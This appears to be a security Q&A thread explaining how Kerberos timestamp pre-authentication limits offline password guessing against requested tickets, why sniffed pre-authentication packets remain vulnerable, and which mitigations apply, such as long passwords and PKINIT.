How does Kerberos' preauthentication increase security?
This FAQ entry (and the RFC itself) states that pre-authentication addresses a weakness in initial implementations of Kerberos that made it vulnerable to offline dictionary attacks.
The FAQ state:
The simplest form of preauthentication is known as PA-ENC-TIMESTAMP. This is simply the current timestamp encrypted with the user's key.
If an attacker manages to sniff a packet containing this preauthentication data, isn't this also vulnerable to a dictionary attack? I have the ciphertext, I know the original timestamp -- how is this scenario any different?
When you do not enforce pre-authentication, the attacker can directly send a dummy request for authentication. The KDC will return an encrypted TGT, and the attacker can brute force it offline. You will see nothing in your KDC logs except a single request for a TGT.
When you enforce timestamp pre-authentication, the attacker cannot directly ask the KDCs for the encrypted material to brute force offline. The attacker has to encrypt a timestamp with a password and offer it to the KDC. Yes, he can do this over and over, but you'll see a KDC log entry every time he fails preauth.
So, timestamp pre-authentication prevents an active attacker. It does not prevent a passive attacker from sniffing the client's encrypted timestamp message to the KDC. If the attacker can sniff that full packet, he can brute force it offline.
Mitigations to this problem include using long passwords and a good password rotation policy to make the offline brute-forcing infeasible, or using PKINIT (http://www.ietf.org/rfc/rfc4556.txt)
I found a paper (Extracting Kerberos passwords through RC4-HMAC encryption type analysis) on IEEE Xplore that is somewhat relevant to this. They seem to imply that if a pre-authentication packet is captured, it is no different.
If an attacker is able to capture the preauthentication packets and wants to take the identity of a valid user, the attacker will need to perform the procedures that the KDC performs. The attacker will need to use the decryption procedure in the agreed upon encryption type and try running different passwords against the captured data. If it is successful then the attacker has the user’s password.